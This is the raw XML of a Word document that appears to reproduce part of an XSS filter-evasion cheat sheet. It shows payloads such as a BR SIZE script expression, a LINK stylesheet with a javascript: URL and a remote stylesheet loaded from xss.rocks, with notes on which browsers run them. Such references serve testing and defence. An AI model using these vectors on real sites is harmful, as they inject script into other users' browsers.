                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2345"/>
                              <a:gd name="T10" fmla="+- 0 424 242"/>
                              <a:gd name="T11" fmla="*/ 424 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2345"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2345"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2345"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2345"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3938 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2345"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3959 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2345"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3959 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2345"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3941 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2345"/>
                              <a:gd name="T42" fmla="+- 0 424 242"/>
                              <a:gd name="T43" fmla="*/ 424 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3938 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2345"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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345" h="183">
                                <a:moveTo>
                                  <a:pt x="232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324" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2345" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2345" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2327" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="232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Text Box 819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1"/>
                            <a:ext cx="234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&lt;BR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SIZE="&amp;{alert('XSS')}"&gt;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8" o:spid="_x0000_s1614" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:117.25pt;height:9.15pt;z-index:-15628800;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="234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">
                <v:shape id="Freeform 820" o:spid="_x0000_s1615" style="position:absolute;left:1614;top:241;width:2345;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="234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7fMMAA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwgh701QXpFuNIiuCp0Wr7HloxrbY&#10;TGoSa9dfbw6Cx8f7Xqx604iOnK8tK5iMExDEhdU1lwpOx+0oBeEDssbGMin4Jw+r5cdggZm2dz5Q&#10;l4dSxBD2GSqoQmgzKX1RkUE/ti1x5M7WGQwRulJqh/cYbho5TZKZNFhzbKiwpZ+Kikt+Mwry7/Pf&#10;fvO7/XLTNHm4Kz9sd90o9Tns13MQgfrwFr/cO60gncS18Uw8An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R7fMMAAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m2324,182l21,182r-3,l,161r,-3l,21,21,,2324,r21,21l2345,161r-18,21l2324,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2324,424;21,424;18,424;0,403;0,400;0,263;21,242;2324,242;2345,263;2345,403;2327,424;2324,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 819" o:spid="_x0000_s1616" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:234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I4AcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKvdWNHoJG1yDFgiCUxvTQ4zP7&#10;TJZk36bZNab/vlso9DjMzDfMNp9sJ0YavHGsYDFPQBBXThuuFXyUr88rED4ga+wck4Jv8pDvZg9b&#10;zLS7c0HjOdQiQthnqKAJoc+k9FVDFv3c9cTRu7rBYohyqKUe8B7htpPLJEmlRcNxocGeXhqq2vPN&#10;Kth/cnEwX2+X9+JamLJcJ3xKW6WeHqf9BkSgKfyH/9pHrWC1WMPvmXg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wjgB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&lt;BR</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="5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SIZE="&amp;{alert('XSS')}"&gt;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STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1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8819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153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2994025" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="814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025" cy="116205"/>
                          <a:chOff x="1614" y="242"/>
                          <a:chExt cx="4715" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="815" name="Freeform 817"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="241"/>
                            <a:ext cx="4715" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6308 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4715"/>
                              <a:gd name="T2" fmla="+- 0 424 242"/>
                              <a:gd name="T3" fmla="*/ 424 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4715"/>
                              <a:gd name="T6" fmla="+- 0 424 242"/>
                              <a:gd name="T7" fmla="*/ 424 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4715"/>
                              <a:gd name="T10" fmla="+- 0 423 242"/>
                              <a:gd name="T11" fmla="*/ 423 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4715"/>
                              <a:gd name="T14" fmla="+- 0 403 242"/>
                              <a:gd name="T15" fmla="*/ 403 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4715"/>
                              <a:gd name="T18" fmla="+- 0 400 242"/>
                              <a:gd name="T19" fmla="*/ 400 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4715"/>
                              <a:gd name="T22" fmla="+- 0 263 242"/>
                              <a:gd name="T23" fmla="*/ 263 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4715"/>
                              <a:gd name="T26" fmla="+- 0 242 242"/>
                              <a:gd name="T27" fmla="*/ 242 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6308 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4715"/>
                              <a:gd name="T30" fmla="+- 0 242 242"/>
                              <a:gd name="T31" fmla="*/ 242 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6329 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4715"/>
                              <a:gd name="T34" fmla="+- 0 263 242"/>
                              <a:gd name="T35" fmla="*/ 263 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6329 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4715"/>
                              <a:gd name="T38" fmla="+- 0 403 242"/>
                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6311 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4715"/>
                              <a:gd name="T42" fmla="+- 0 423 242"/>
                              <a:gd name="T43" fmla="*/ 423 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6308 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4715"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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15" h="183">
                                <a:moveTo>
                                  <a:pt x="469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694" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4697" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469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Text Box 81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1"/>
                            <a:ext cx="471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&lt;LINK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REL="stylesheet"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HREF="javascript:alert('XSS');"&gt;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5" o:spid="_x0000_s1617" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:235.75pt;height:9.15pt;z-index:-15628288;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="471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">
                <v:shape id="Freeform 817" o:spid="_x0000_s1618" style="position:absolute;left:1614;top:241;width:4715;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="471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hs48QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3WTgkWiq4hi8WqqSG6P7DMb&#10;zb4N2VWjv75bKPQ4zMw3zHzZ20bcqfO1YwXpOAFBXDpdc6Xg8L19n4LwAVlj45gUPMnDcjF4m2Om&#10;3YP3dM9DJSKEfYYKTAhtJqUvDVn0Y9cSR+/sOoshyq6SusNHhNtGfiTJp7RYc1ww2NLaUHnNb1bB&#10;5fA69tuvY1rkpiluk826aE9PpUbDfjUDEagP/+G/9k4rmKYT+D0Tj4B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obOPEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4694,182l21,182r-3,-1l,161r,-3l,21,21,,4694,r21,21l4715,161r-18,20l4694,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4694,424;21,424;18,423;0,403;0,400;0,263;21,242;4694,242;4715,263;4715,403;4697,423;4694,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 816" o:spid="_x0000_s1619" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:471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2sc8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxh6DRVUQsCIXSGA8en9ln&#10;sph9G7Orpv++Wyh4HGbmG2a57m0jHtR541jBdJKAIC6dNlwpOBYf4xkIH5A1No5JwQ95WK+GgyVm&#10;2j05p8chVCJC2GeooA6hzaT0ZU0W/cS1xNG7uM5iiLKrpO7wGeG2ke9JkkqLhuNCjS1tayqvh7tV&#10;sDlxvjO3r/N3fslNUcwT/kyvSr2N+s0CRKA+vML/7b1WMJum8Hc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drHP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&lt;LINK</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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REL="stylesheet"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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HREF="javascript:alert('XSS');"&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sheet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1" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="125"/>
      </w:pPr>
      <w:r>
        <w:t>Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>something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simple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remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>parameter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redefined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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embedded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>expression.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works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IE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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1+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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Notice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there</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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nothing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page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show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included</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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they</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tag,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>so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won't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>unless</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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content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page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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than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vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>itself,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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you'll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>letter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page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it's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otherwise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>blank</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5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8870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104140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2994025" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="811" name="Group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025" cy="116205"/>
                          <a:chOff x="1614" y="164"/>
                          <a:chExt cx="4715" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="812" name="Freeform 814"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="164"/>
                            <a:ext cx="4715" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6308 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4715"/>
                              <a:gd name="T2" fmla="+- 0 346 164"/>
                              <a:gd name="T3" fmla="*/ 346 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4715"/>
                              <a:gd name="T6" fmla="+- 0 346 164"/>
                              <a:gd name="T7" fmla="*/ 346 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4715"/>
                              <a:gd name="T10" fmla="+- 0 346 164"/>
                              <a:gd name="T11" fmla="*/ 346 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4715"/>
                              <a:gd name="T14" fmla="+- 0 325 164"/>
                              <a:gd name="T15" fmla="*/ 325 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4715"/>
                              <a:gd name="T18" fmla="+- 0 322 164"/>
                              <a:gd name="T19" fmla="*/ 322 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4715"/>
                              <a:gd name="T22" fmla="+- 0 185 164"/>
                              <a:gd name="T23" fmla="*/ 185 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4715"/>
                              <a:gd name="T26" fmla="+- 0 164 164"/>
                              <a:gd name="T27" fmla="*/ 164 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6308 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4715"/>
                              <a:gd name="T30" fmla="+- 0 164 164"/>
                              <a:gd name="T31" fmla="*/ 164 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6329 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4715"/>
                              <a:gd name="T34" fmla="+- 0 185 164"/>
                              <a:gd name="T35" fmla="*/ 185 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6329 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4715"/>
                              <a:gd name="T38" fmla="+- 0 325 164"/>
                              <a:gd name="T39" fmla="*/ 325 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6311 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4715"/>
                              <a:gd name="T42" fmla="+- 0 346 164"/>
                              <a:gd name="T43" fmla="*/ 346 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6308 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4715"/>
                              <a:gd name="T46" fmla="+- 0 346 164"/>
                              <a:gd name="T47" fmla="*/ 34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15" h="183">
                                <a:moveTo>
                                  <a:pt x="469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694" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4715" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4697" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469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Text Box 81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4"/>
                            <a:ext cx="471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&lt;LINK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REL="stylesheet"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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId26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http://xss.rocks/xss.css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2" o:spid="_x0000_s1620" style="position:absolute;margin-left:80.7pt;margin-top:8.2pt;width:235.75pt;height:9.15pt;z-index:-15627776;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,164" coordsize="471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">
                <v:shape id="Freeform 814" o:spid="_x0000_s1621" style="position:absolute;left:1614;top:164;width:4715;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="471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H0l8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEb3UTwSLRVUSx9NqoSG6P7DOb&#10;Nvs2ZFeN/fVdQfA4zMw3zGLV20ZcqfO1YwXpOAFBXDpdc6XgsN+9z0D4gKyxcUwK7uRhtRy8LTDT&#10;7sbfdM1DJSKEfYYKTAhtJqUvDVn0Y9cSR+/sOoshyq6SusNbhNtGTpLkQ1qsOS4YbGljqPzNL1bB&#10;z+Hv2O8+j2mRm6a4TLeboj3dlRoN+/UcRKA+vMLP9pdWMEsn8DgTj4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B9JfEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m4694,182l21,182r-3,l,161r,-3l,21,21,,4694,r21,21l4715,161r-18,21l4694,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4694,346;21,346;18,346;0,325;0,322;0,185;21,164;4694,164;4715,185;4715,325;4697,346;4694,346" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 813" o:spid="_x0000_s1622" type="#_x0000_t202" style="position:absolute;left:1614;top:164;width:471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oP68UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVems2VhBN3YhIBaFQGuPB42v2&#10;mSzJvo3ZVdN/3y0UPA4z8w2zXI22E1cavHGsYJKkIIgrpw3XCg7l9mUOwgdkjZ1jUvBDHlb548MS&#10;M+1uXNB1H2oRIewzVNCE0GdS+qohiz5xPXH0Tm6wGKIcaqkHvEW47eRrms6kRcNxocGeNg1V7f5i&#10;FayPXLyb8+f3V3EqTFkuUv6YtUo9P43rNxCBxnAP/7d3WsF8MoW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g/r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&lt;LINK</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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REL="stylesheet"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId27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http://xss.rocks/xss.css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Remote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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3950"/>
        </w:tabs>
        <w:spacing w:before="101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32352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2992755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>67945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="808" name="Group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4713" y="107"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="809" name="Freeform 811"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4712" y="107"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5348 4713"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 289 107"/>
                              <a:gd name="T3" fmla="*/ 289 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4734 4713"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 289 107"/>
                              <a:gd name="T7" fmla="*/ 289 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4731 4713"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 289 107"/>
                              <a:gd name="T11" fmla="*/ 289 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4713 4713"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 268 107"/>
                              <a:gd name="T15" fmla="*/ 268 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4713 4713"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 265 107"/>
                              <a:gd name="T19" fmla="*/ 265 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4713 4713"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 128 107"/>
                              <a:gd name="T23" fmla="*/ 128 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4734 4713"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 107 107"/>
                              <a:gd name="T27" fmla="*/ 107 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5348 4713"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 107 107"/>
                              <a:gd name="T31" fmla="*/ 107 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5369 4713"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 128 107"/>
                              <a:gd name="T35" fmla="*/ 128 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5369 4713"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 268 107"/>
